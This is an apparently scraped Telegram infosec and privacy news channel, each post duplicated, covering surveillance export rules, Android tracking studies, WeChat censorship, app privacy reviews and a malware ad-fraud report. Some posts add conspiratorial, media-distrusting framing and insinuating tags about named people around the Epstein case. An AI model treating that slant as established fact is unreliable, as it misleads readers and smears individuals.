EU states unanimously vote against stricter export controls for surveillance equipment
The EU wants to more closely control the trade of the European surveillance industry with autocratic regimes. After two years of tough negotiations, the member states have found a „compromise“: they are against anything that could limit the trade of spyware. Germany agreed as well.
Daniel Moßbrucker accompanies the reform of the EU Dual Use Regulation for Reporters Without Borders. The human rights NGO works globally for the protection of journalists and fights against censorship online and offline. (This text is the translation of the original German version.)
On 28 May, the UN special rapporteur on the right to freedom of opinion and expression, David Kaye, appealed to the international community and demanded a moratorium on the sale of spying technology. Everywhere in the world, journalists, activists and opposition members are being monitored with state-of-the-art technology, trade is flourishing – and global regulation is at best in its infancy.
With the same arguments, the EU Commission had already submitted a reform proposal in 2016 for the European control system. The items include hacking software, large data centres for data retention, IMSI catchers for monitoring demonstrations and equipment for telecommunications surveillance.
For more than two years, the EU member states had been arguing fiercely about the Commission’s plans before they presented their „compromise“ exactly one week after Kaye’s demand. They are against any plans that would allow stronger controls on surveillance technology.
Read more:
https://rwtxt.lelux.fi/blackbox/peu-states-unanimously-vote-against-stricter-export-controls-for-surveillance-equipmentp
#EU #surveillance #export #equipment
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
The EU wants to more closely control the trade of the European surveillance industry with autocratic regimes. After two years of tough negotiations, the member states have found a „compromise“: they are against anything that could limit the trade of spyware. Germany agreed as well.
Daniel Moßbrucker accompanies the reform of the EU Dual Use Regulation for Reporters Without Borders. The human rights NGO works globally for the protection of journalists and fights against censorship online and offline. (This text is the translation of the original German version.)
On 28 May, the UN special rapporteur on the right to freedom of opinion and expression, David Kaye, appealed to the international community and demanded a moratorium on the sale of spying technology. Everywhere in the world, journalists, activists and opposition members are being monitored with state-of-the-art technology, trade is flourishing – and global regulation is at best in its infancy.
With the same arguments, the EU Commission had already submitted a reform proposal in 2016 for the European control system. The items include hacking software, large data centres for data retention, IMSI catchers for monitoring demonstrations and equipment for telecommunications surveillance.
For more than two years, the EU member states had been arguing fiercely about the Commission’s plans before they presented their „compromise“ exactly one week after Kaye’s demand. They are against any plans that would allow stronger controls on surveillance technology.
Read more:
https://rwtxt.lelux.fi/blackbox/peu-states-unanimously-vote-against-stricter-export-controls-for-surveillance-equipmentp
#EU #surveillance #export #equipment
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
50 Ways to Leak Your Data: An Exploration of Apps’ Circumvention of the Android Permissions System
Apps can also access tracking data without authorization
The Android permission model can be circumvented with tricks. A study found 1,325 apps that can access the corresponding data even without authorization.
The Android authorization system is designed to protect particularly sensitive data. Only when the user grants an app the corresponding authorization can it access the location or the device ID, for example. However, some applications bypass the permissions by accessing the corresponding data in other ways. Researchers at Berkeley University (USA), the IMDEA Networks Institute (Spain) and the University of Calgary (Canada) found this out.
PDF:
https://www.ftc.gov/system/files/documents/public_events/1415032/privacycon2019_serge_egelman.pdf
#android #data #circumvent #tracking #authorization #poc
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Apps can also access tracking data without authorization
The Android permission model can be circumvented with tricks. A study found 1,325 apps that can access the corresponding data even without authorization.
The Android authorization system is designed to protect particularly sensitive data. Only when the user grants an app the corresponding authorization can it access the location or the device ID, for example. However, some applications bypass the permissions by accessing the corresponding data in other ways. Researchers at Berkeley University (USA), the IMDEA Networks Institute (Spain) and the University of Calgary (Canada) found this out.
PDF:
https://www.ftc.gov/system/files/documents/public_events/1415032/privacycon2019_serge_egelman.pdf
#android #data #circumvent #tracking #authorization #poc
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Audio
🎧 The Internet’s Carbon Footprint
Manoush Zomorodi explores the surprising environmental impact of the internet in this episode of IRL. Because while it’s easy to think of the internet as living only on your screen, energy demand for the internet is indeed powered by massive server farms, running around the clock, all over the world. What exactly is the internet’s carbon footprint? And, what can we do about it?
📻 https://irlpodcast.org/
#IRL #carbon #footprint #podcast
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Manoush Zomorodi explores the surprising environmental impact of the internet in this episode of IRL. Because while it’s easy to think of the internet as living only on your screen, energy demand for the internet is indeed powered by massive server farms, running around the clock, all over the world. What exactly is the internet’s carbon footprint? And, what can we do about it?
📻 https://irlpodcast.org/
#IRL #carbon #footprint #podcast
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
(Can’t) Picture This 2 An Analysis of WeChat’s Realtime Image Filtering in Chats
Key Findings:
👁🗨 WeChat implements realtime, automatic censorship of chat images based on text contained in images and on an image’s visual similarity to those on a blacklist
👁🗨 WeChat facilitates realtime filtering by maintaining a hash index populated by MD5 hashes of images sent by users of the chat platform
👁🗨 We compare levels of filtering across WeChat’s Moments, group chat, and 1-to-1 chat features and find that each has different images censored; we find that Moments and group chat are generally more heavily filtered than 1-to-1
👁🗨 WeChat targets predominantly political content including images pertaining to government and social resistance
👁🗨 WeChat’s image censorship is reactive to news events; we found censored images covering a wide range of events, including the arrest of Huawei’s CFO, the Sino-US Trade War, and the 2018 US Midterm Elections
https://citizenlab.ca/2019/07/cant-picture-this-2-an-analysis-of-wechats-realtime-image-filtering-in-chats/
#WeChat #filter #realtime #images #china #censorship
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Key Findings:
👁🗨 WeChat implements realtime, automatic censorship of chat images based on text contained in images and on an image’s visual similarity to those on a blacklist
👁🗨 WeChat facilitates realtime filtering by maintaining a hash index populated by MD5 hashes of images sent by users of the chat platform
👁🗨 We compare levels of filtering across WeChat’s Moments, group chat, and 1-to-1 chat features and find that each has different images censored; we find that Moments and group chat are generally more heavily filtered than 1-to-1
👁🗨 WeChat targets predominantly political content including images pertaining to government and social resistance
👁🗨 WeChat’s image censorship is reactive to news events; we found censored images covering a wide range of events, including the arrest of Huawei’s CFO, the Sino-US Trade War, and the 2018 US Midterm Elections
https://citizenlab.ca/2019/07/cant-picture-this-2-an-analysis-of-wechats-realtime-image-filtering-in-chats/
#WeChat #filter #realtime #images #china #censorship
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Media is too big
VIEW IN TELEGRAM
The WORST Part of the Epstein Case – #PropagandaWatch
According to the dinosaur media, the worst part about the exposure of Jeffrey #Epstein’s child sex trafficking and high-level #blackmail operation is that it bolsters #conspiracy theories about child sex trafficking and elite corruption.
❗️Newsflash: they’re trying to gaslight you. Don’t fall for it for a second.
📺 https://www.corbettreport.com/the-worst-part-of-the-epstein-case-propagandawatch/
#corbettreport #video #podcast
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
According to the dinosaur media, the worst part about the exposure of Jeffrey #Epstein’s child sex trafficking and high-level #blackmail operation is that it bolsters #conspiracy theories about child sex trafficking and elite corruption.
❗️Newsflash: they’re trying to gaslight you. Don’t fall for it for a second.
📺 https://www.corbettreport.com/the-worst-part-of-the-epstein-case-propagandawatch/
#corbettreport #video #podcast
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Security reports reveal how Assange turned an embassy into a command post for election meddling
New documents obtained exclusively by CNN reveal that WikiLeaks founder Julian Assange received in-person deliveries, potentially of hacked materials related to the 2016 US election, during a series of suspicious meetings at the Ecuadorian Embassy in London.
The documents build on the possibility, raised by special counsel Robert Mueller in his report on Russian meddling, that couriers brought hacked files to Assange at the embassy.
The surveillance reports also describe how Assange turned the embassy into a command center and orchestrated a series of damaging disclosures that rocked the 2016 presidential campaign in the United States.
Despite being confined to the embassy while seeking safe passage to Ecuador, Assange met with Russians and world-class hackers at critical moments, frequently for hours at a time. He also acquired powerful new computing and network hardware to facilitate data transfers just weeks before WikiLeaks received hacked materials from Russian operatives.
These stunning details come from hundreds of surveillance reports compiled for the Ecuadorian government by UC Global, a private Spanish security company, and obtained by CNN. They chronicle Assange’s movements and provide an unprecedented window into his life at the embassy. They also add a new dimension to the Mueller report, which cataloged how WikiLeaks helped the Russians undermine the US election.
An Ecuadorian intelligence official told CNN that the surveillance reports are authentic.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/exclusive-security-reports-reveal-how-assange-turned-an-embassy-into-a-command-post-for-election-meddling
#FreeAssange #thinkabout
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
New documents obtained exclusively by CNN reveal that WikiLeaks founder Julian Assange received in-person deliveries, potentially of hacked materials related to the 2016 US election, during a series of suspicious meetings at the Ecuadorian Embassy in London.
The documents build on the possibility, raised by special counsel Robert Mueller in his report on Russian meddling, that couriers brought hacked files to Assange at the embassy.
The surveillance reports also describe how Assange turned the embassy into a command center and orchestrated a series of damaging disclosures that rocked the 2016 presidential campaign in the United States.
Despite being confined to the embassy while seeking safe passage to Ecuador, Assange met with Russians and world-class hackers at critical moments, frequently for hours at a time. He also acquired powerful new computing and network hardware to facilitate data transfers just weeks before WikiLeaks received hacked materials from Russian operatives.
These stunning details come from hundreds of surveillance reports compiled for the Ecuadorian government by UC Global, a private Spanish security company, and obtained by CNN. They chronicle Assange’s movements and provide an unprecedented window into his life at the embassy. They also add a new dimension to the Mueller report, which cataloged how WikiLeaks helped the Russians undermine the US election.
An Ecuadorian intelligence official told CNN that the surveillance reports are authentic.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/exclusive-security-reports-reveal-how-assange-turned-an-embassy-into-a-command-post-for-election-meddling
#FreeAssange #thinkabout
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Shelter: Isolate Big Brother apps - Take back control! (Part 7)
1. Big Data
The collection, processing and analysis of as much information as possible is Big Data’s core business. In this non-transparent data processing, which is determined by algorithms, personal rights are hardly taken into consideration. This dilemma becomes particularly clear in the Android world: Apps access personal data uninhibitedly and send it unsolicited to the most diverse protagonists. This is exactly what the article series “Take back control!” wants to protect against.
Another piece of the puzzle to achieve this goal is the App Shelter, which locks selected Android apps in a sandbox, depriving them of access to phone books, calendars, images and other data. Curious apps can thus be denied access to sensitive user data.
💡 This article is part of a series of articles:
✅ Android without Google: Take back control! Part 1
✅ LineageOS - Take back control! Part2
✅ Magisk: By the power of Root - Take back control! Part 3 (not yet translated)
✅ AFWall+: Digital Door Controller - Take back control! Part 4
✅ F-Droid: Free and Open Source Apps - Take back control! Part 5
✅ AdAway: Advertising and tracking blocker - Take back control! Part 6
✅ Shelter: Isolate Big Brother apps - Take back control! Part 7
2. Shelter
Shelter is an open source app for Android that can be downloaded from the App-Store F-Droid. Alternatively the app can be downloaded via GitHub or the Google Play Store.
To separate apps, Shelter uses the Android work profiles that Google introduced as early as 2015 to separate private data from business content or apps. The work profile is a specially isolated area in which, for example, data-hungry apps can be stored. In addition to the normal environment in which all apps are normally located, Shelter creates another workspace that is logically separated from the other workspace. From this bunker (Shelter) apps can not access data which are in the normal environment - but all data of apps which are also stored or locked in the Shelter.
👉🏼 Read the fully translated guide:
https://rwtxt.lelux.fi/blackbox/shelter-isolate-big-brother-apps-take-back-control-part-7
👉🏼 Source 🇩🇪:
https://www.kuketz-blog.de/shelter-big-brother-apps-isolieren-take-back-control-teil7/
#android #shelter #NoGoogle #guide #part1 #part2 #part4 #part5 #part6 #part7 #kuketz
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
1. Big Data
The collection, processing and analysis of as much information as possible is Big Data’s core business. In this non-transparent data processing, which is determined by algorithms, personal rights are hardly taken into consideration. This dilemma becomes particularly clear in the Android world: Apps access personal data uninhibitedly and send it unsolicited to the most diverse protagonists. This is exactly what the article series “Take back control!” wants to protect against.
Another piece of the puzzle to achieve this goal is the App Shelter, which locks selected Android apps in a sandbox, depriving them of access to phone books, calendars, images and other data. Curious apps can thus be denied access to sensitive user data.
💡 This article is part of a series of articles:
✅ Android without Google: Take back control! Part 1
✅ LineageOS - Take back control! Part2
✅ Magisk: By the power of Root - Take back control! Part 3 (not yet translated)
✅ AFWall+: Digital Door Controller - Take back control! Part 4
✅ F-Droid: Free and Open Source Apps - Take back control! Part 5
✅ AdAway: Advertising and tracking blocker - Take back control! Part 6
✅ Shelter: Isolate Big Brother apps - Take back control! Part 7
2. Shelter
Shelter is an open source app for Android that can be downloaded from the App-Store F-Droid. Alternatively the app can be downloaded via GitHub or the Google Play Store.
To separate apps, Shelter uses the Android work profiles that Google introduced as early as 2015 to separate private data from business content or apps. The work profile is a specially isolated area in which, for example, data-hungry apps can be stored. In addition to the normal environment in which all apps are normally located, Shelter creates another workspace that is logically separated from the other workspace. From this bunker (Shelter) apps can not access data which are in the normal environment - but all data of apps which are also stored or locked in the Shelter.
👉🏼 Read the fully translated guide:
https://rwtxt.lelux.fi/blackbox/shelter-isolate-big-brother-apps-take-back-control-part-7
👉🏼 Source 🇩🇪:
https://www.kuketz-blog.de/shelter-big-brother-apps-isolieren-take-back-control-teil7/
#android #shelter #NoGoogle #guide #part1 #part2 #part4 #part5 #part6 #part7 #kuketz
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Amazon is listening to your kids and visitors, warns German parliament report
Smart speakers like Alexa not only store the voices of their registered users, but also those of children and unsuspecting guests. This constitutes a legal problem, says a report commissioned by the German parliament.
Amazon’s voice assistant listens far more often than people might know. Alexa does not only pick up the voices of adults who consciously interact with the system, but also those of others who do not know the assistant is recording them. That could be a visitor or a minor.
This function of Alexa is now subject of a report by the Research Service of the German parliament, the Bundestag. The service is impartial, researching and analysing information on behalf of committees and by request of members of parliament. The paper examines whether the recording, trannoscription and evaluation of voice recordings by Amazon are legal under German law.
When Alexa is first installed, users must give their consent to the processing and storage of their data. The mandatory information about the use and administration of their data is described sufficiently on Amazon’s website and in the Alexa app, according to the experts. Users can manage and delete the stored data in their profile. However, it remains unclear for how long Amazon stores the voice recordings and how often the software records unintended noises and conversations.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/amazon-is-listening-to-your-kids-and-visitors-warns-german-parliament-report
#DeleteAmazon #Alexa #DataProtection #privacy
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Smart speakers like Alexa not only store the voices of their registered users, but also those of children and unsuspecting guests. This constitutes a legal problem, says a report commissioned by the German parliament.
Amazon’s voice assistant listens far more often than people might know. Alexa does not only pick up the voices of adults who consciously interact with the system, but also those of others who do not know the assistant is recording them. That could be a visitor or a minor.
This function of Alexa is now subject of a report by the Research Service of the German parliament, the Bundestag. The service is impartial, researching and analysing information on behalf of committees and by request of members of parliament. The paper examines whether the recording, trannoscription and evaluation of voice recordings by Amazon are legal under German law.
When Alexa is first installed, users must give their consent to the processing and storage of their data. The mandatory information about the use and administration of their data is described sufficiently on Amazon’s website and in the Alexa app, according to the experts. Users can manage and delete the stored data in their profile. However, it remains unclear for how long Amazon stores the voice recordings and how often the software records unintended noises and conversations.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/amazon-is-listening-to-your-kids-and-visitors-warns-german-parliament-report
#DeleteAmazon #Alexa #DataProtection #privacy
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
SwiftKey: BlackBox with permanent tracking
On the fourth day of the App Review Week, I test the Android app SwiftKey (version 7.3.3.12) - a keyboard app from Microsoft that accepts input via wipe gestures. Let’s start with the network connections that SwiftKey establishes during use.
App start: Immediately after start (no user interaction)
[1] Immediately after startup, the app contacts the SwiftKey servers [jenson.api.swiftkey.com] to update LanguagePack information:
👉🏼 Full translated review:
https://rwtxt.lelux.fi/blackbox/swiftkey-blackbox-with-permanent-tracking
Source 🇩🇪:
https://www.kuketz-blog.de/swiftkey-blackbox-mit-dauerhaftem-tracking/
#SwifkKey #App #review #kuketz
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
On the fourth day of the App Review Week, I test the Android app SwiftKey (version 7.3.3.12) - a keyboard app from Microsoft that accepts input via wipe gestures. Let’s start with the network connections that SwiftKey establishes during use.
App start: Immediately after start (no user interaction)
[1] Immediately after startup, the app contacts the SwiftKey servers [jenson.api.swiftkey.com] to update LanguagePack information:
GET /swiftkey/sksdk-3.0/sk-7.3.3/market/languagePacksSSL.json HTTP/1.1 Accept-Encoding: gzip, deflate Range: bytes=0- User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Mi A1 Build/PQ3A.190705.003) Host: jenson.api.swiftkey.com Connection: close[2] The updates for the language packs (LanguagePacks) are then downloaded via a cloudfront server
[d4kkhvu20wq9i.cloudfront.net]:👉🏼 Full translated review:
https://rwtxt.lelux.fi/blackbox/swiftkey-blackbox-with-permanent-tracking
Source 🇩🇪:
https://www.kuketz-blog.de/swiftkey-blackbox-mit-dauerhaftem-tracking/
#SwifkKey #App #review #kuketz
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Firefox classifies HTTP websites as insecure in the future
The function is active and works in Firefox 70. The function is currently available only in the Nightly Channel. But Firefox 68 can also be configured manually so that the URLs of unencrypted websites are provided with a crossed-out lock and the addition "Not secure".
💡 According to the report, the security warning is now activated in the Nightly version of Firefox 70.
Users of the current version 68 can already unlock the feature via the configuration page "
You simply have to change the following settings by double clicking to "True":
„
„
„
„
„
https://www.ghacks.net/2019/07/18/firefox-to-mark-all-http-sites-as-not-secure/
#mozilla #firefox #browser #tip #tricks #HTTP #encryption
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
The function is active and works in Firefox 70. The function is currently available only in the Nightly Channel. But Firefox 68 can also be configured manually so that the URLs of unencrypted websites are provided with a crossed-out lock and the addition "Not secure".
💡 According to the report, the security warning is now activated in the Nightly version of Firefox 70.
Users of the current version 68 can already unlock the feature via the configuration page "
about:config".You simply have to change the following settings by double clicking to "True":
„
about:config“„
security.insecure_connection_icon.enabled“„
security.insecure_connection_icon.pbmode.enabled“„
security.insecure_connection_text.enabled“„
security.insecure_connection_text.pbmode.enabled“ https://www.ghacks.net/2019/07/18/firefox-to-mark-all-http-sites-as-not-secure/
#mozilla #firefox #browser #tip #tricks #HTTP #encryption
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Amazon is turning advertising into its next huge business — here’s how
☢️ Amazon has built a huge advertising business. Here’s a little more about how it all works.
☢️ The e-commerce giant lets advertisers reach consumers through product ads or even videos on third-party websites.
☢️ While shopping on Prime Day, this is how to spot and understand some of the ad products used to encourage you to buy certain products.
If you were browsing Amazon in search of deals for Prime Day, you undoubtedly came across a lot of ads. That’s because Amazon has a trove of information about buying habits that makes it a valuable place for advertisers.
Think about it: Amazon knows the last time you bought toothpaste on the site and which brand you typically like to buy. Advertisers can use that information to try to get you to buy their brand of toothpaste right when you’re running low.
Other advertisers can use Amazon to target ads, even if they’re selling products that you can’t necessarily buy on Amazon, like insurance or a car. These advertisers can use Amazon’s extensive customer data to figure out who might buy their product or services, and they can use Amazon’s ad products to reach those people, both on Amazon’s properties and through a network of third-party sites.
This rich trove of data has made Amazon into the third-largest digital ad platform in the U.S. and a growing contender to take on the digital ad duopoly of Google and Facebook. Earlier this year, eMarketer said it expected Amazon to claim 8.8% of U.S. digital ad spend in 2019, up from 6.8% in 2018, while expecting Google to drop from 38.2% to 37.2%. Meanwhile, Facebook was expected to pull 22.1% of digital ad spend in 2019, up very slightly from 21.8%. Amazon’s net sales in its “other” category, which consists primarily of advertising sales, was $2.72 billion in the first quarter.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/amazon-is-turning-advertising-into-its-next-huge-business-heres-how
#DeleteAmazon #advertising #business
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
☢️ Amazon has built a huge advertising business. Here’s a little more about how it all works.
☢️ The e-commerce giant lets advertisers reach consumers through product ads or even videos on third-party websites.
☢️ While shopping on Prime Day, this is how to spot and understand some of the ad products used to encourage you to buy certain products.
If you were browsing Amazon in search of deals for Prime Day, you undoubtedly came across a lot of ads. That’s because Amazon has a trove of information about buying habits that makes it a valuable place for advertisers.
Think about it: Amazon knows the last time you bought toothpaste on the site and which brand you typically like to buy. Advertisers can use that information to try to get you to buy their brand of toothpaste right when you’re running low.
Other advertisers can use Amazon to target ads, even if they’re selling products that you can’t necessarily buy on Amazon, like insurance or a car. These advertisers can use Amazon’s extensive customer data to figure out who might buy their product or services, and they can use Amazon’s ad products to reach those people, both on Amazon’s properties and through a network of third-party sites.
This rich trove of data has made Amazon into the third-largest digital ad platform in the U.S. and a growing contender to take on the digital ad duopoly of Google and Facebook. Earlier this year, eMarketer said it expected Amazon to claim 8.8% of U.S. digital ad spend in 2019, up from 6.8% in 2018, while expecting Google to drop from 38.2% to 37.2%. Meanwhile, Facebook was expected to pull 22.1% of digital ad spend in 2019, up very slightly from 21.8%. Amazon’s net sales in its “other” category, which consists primarily of advertising sales, was $2.72 billion in the first quarter.
👉🏼 Read the full story without ads n shit:
https://rwtxt.lelux.fi/blackbox/amazon-is-turning-advertising-into-its-next-huge-business-heres-how
#DeleteAmazon #advertising #business
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Newly Discovered Malware Framework Cashing in on Ad Fraud
A newly discovered malware framework is responsible for more than one billion fraudulent ad impressions in the past three months, generating its operators significant Google AdSense revenue on a monthly basis.
Flashpoint researchers uncovered the framework, which features three separate stages that ultimately install a malicious browser extension designed to perform fraudulent AdSense impressions, as well as generate likes on YouTube videos and watch hidden Twitch streams.
The framework is designed to pad statistics on social sites and ad impressions, creating revenue for its operators who are using a botnet to attack the content and advertising platforms by spreading the malware and targeting browsers including Google Chrome, Mozilla Firefox, and Yandex’s browser.
Most video and streaming services have tiers for their content producers, which calculates how much they are paid for their content. Content producers benefit financially from higher counts, which can lead to some unscrupulous behavior.
Flashpoint researchers found code, for example, that looks for YouTube referrers and then injects a new noscript tag to load code for YouTube. In this case, the injected JavaScript has an extensive amount of code that is designed to like videos, most of which are related to political topics in Russia. Separately, researchers also found code that injects an iframe into the browser designed to play a hidden Twitch stream, padding the viewer stats for the streamer on that page.
Read more:
https://www.flashpoint-intel.com/blog/newly-discovered-malware-framework-cashing-in-on-ad-fraud/
#malware #malicious #framework #AdFraud #AdSense #browser #extension
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
A newly discovered malware framework is responsible for more than one billion fraudulent ad impressions in the past three months, generating its operators significant Google AdSense revenue on a monthly basis.
Flashpoint researchers uncovered the framework, which features three separate stages that ultimately install a malicious browser extension designed to perform fraudulent AdSense impressions, as well as generate likes on YouTube videos and watch hidden Twitch streams.
The framework is designed to pad statistics on social sites and ad impressions, creating revenue for its operators who are using a botnet to attack the content and advertising platforms by spreading the malware and targeting browsers including Google Chrome, Mozilla Firefox, and Yandex’s browser.
Most video and streaming services have tiers for their content producers, which calculates how much they are paid for their content. Content producers benefit financially from higher counts, which can lead to some unscrupulous behavior.
Flashpoint researchers found code, for example, that looks for YouTube referrers and then injects a new noscript tag to load code for YouTube. In this case, the injected JavaScript has an extensive amount of code that is designed to like videos, most of which are related to political topics in Russia. Separately, researchers also found code that injects an iframe into the browser designed to play a hidden Twitch stream, padding the viewer stats for the streamer on that page.
Read more:
https://www.flashpoint-intel.com/blog/newly-discovered-malware-framework-cashing-in-on-ad-fraud/
#malware #malicious #framework #AdFraud #AdSense #browser #extension
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Media is too big
VIEW IN TELEGRAM
David K. Levine is Against Intellectual Monopoly
David K. Levine is an economist at the European University Institute and at Washington University in St. Louis. He is the author with Michele Boldrin of Against Intellectual Monopoly, an empirical study of the economics of intellectual property that concludes that IP is not necessary for innovation and as a practical matter is damaging to growth, prosperity and liberty.
📺 https://www.corbettreport.com/david-k-levine-is-against-intellectual-monopoly/
#corbettreport #intellectual #monopoly #video #podcast
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
David K. Levine is an economist at the European University Institute and at Washington University in St. Louis. He is the author with Michele Boldrin of Against Intellectual Monopoly, an empirical study of the economics of intellectual property that concludes that IP is not necessary for innovation and as a practical matter is damaging to growth, prosperity and liberty.
📺 https://www.corbettreport.com/david-k-levine-is-against-intellectual-monopoly/
#corbettreport #intellectual #monopoly #video #podcast
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Media is too big
VIEW IN TELEGRAM
NBC Released A Tape Showing Donald Trump and Jeffrey Epstein discussing women at 1992 party
An footage from 1992 released this week by NBC, United States President Donald Trump can be seen joking and laughing with Jeffrey Epstein at a party.
Trump said that Epstein was a “terrific guy”
“He’s a lot of fun to be with. It is even said that he likes beautiful women as much as I do, and many of them are on the younger side,” Trump said at the time.
https://www.nbcnews.com/news/us-news/tape-shows-donald-trump-jeffrey-epstein-discussing-women-1992-party-n1030686
#Epstein #Trump #pedo #conspiracy #SexTrafficking
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
An footage from 1992 released this week by NBC, United States President Donald Trump can be seen joking and laughing with Jeffrey Epstein at a party.
Trump said that Epstein was a “terrific guy”
“He’s a lot of fun to be with. It is even said that he likes beautiful women as much as I do, and many of them are on the younger side,” Trump said at the time.
https://www.nbcnews.com/news/us-news/tape-shows-donald-trump-jeffrey-epstein-discussing-women-1992-party-n1030686
#Epstein #Trump #pedo #conspiracy #SexTrafficking
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
Tracking sex: The implications of widespread sexual data leakage and tracking on porn websites
This paper explores tracking and privacy risks on pornography websites. Our analysis of 22,484 pornography websites indicated that 93% leak user data to a third party.
Tracking on these sites is highly concentrated by a handful of major companies, which we identify. We successfully extracted privacy policies for 3,856 sites, 17% of the total. The policies were written such that one might need a two-year college education to understand them.
Our content analysis of the sample's domains indicated 44.97% of them expose or suggest a specific gender/sexual identity or interest likely to be linked to the user. We identify three core implications of the quantitative results: 1) the unique/elevated risks of porn data leakage versus other types of data, 2) the particular risks/impact for vulnerable populations, and 3) the complications of providing consent for porn site users and the need for affirmative consent in these online sexual interactions.
PDF - Analysis:
https://arxiv.org/pdf/1907.06520.pdf
#study #analysis #sex #porn #websites #tracking #google #facebook #pdf
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
This paper explores tracking and privacy risks on pornography websites. Our analysis of 22,484 pornography websites indicated that 93% leak user data to a third party.
Tracking on these sites is highly concentrated by a handful of major companies, which we identify. We successfully extracted privacy policies for 3,856 sites, 17% of the total. The policies were written such that one might need a two-year college education to understand them.
Our content analysis of the sample's domains indicated 44.97% of them expose or suggest a specific gender/sexual identity or interest likely to be linked to the user. We identify three core implications of the quantitative results: 1) the unique/elevated risks of porn data leakage versus other types of data, 2) the particular risks/impact for vulnerable populations, and 3) the complications of providing consent for porn site users and the need for affirmative consent in these online sexual interactions.
PDF - Analysis:
https://arxiv.org/pdf/1907.06520.pdf
#study #analysis #sex #porn #websites #tracking #google #facebook #pdf
📡@cRyPtHoN_INFOSEC_DE
📡@cRyPtHoN_INFOSEC_EN
📡@cRyPtHoN_INFOSEC_ES
📡@FLOSSb0xIN
DataSpii: The catastrophic data leak via browser extensions
We present DataSpii (pronounced data-spy), the catastrophic data leak that occurs when any one of eight browser extensions collects browsing activity data — including personally identifiable information (PII) and corporate information (CI) — from unwitting Chrome and Firefox users.
Our investigation uncovered an online service selling the collected browsing activity data to its subnoscription members in near real-time. In this report, we delineate the sensitive data source types relevant to the security of individuals and businesses across the globe.
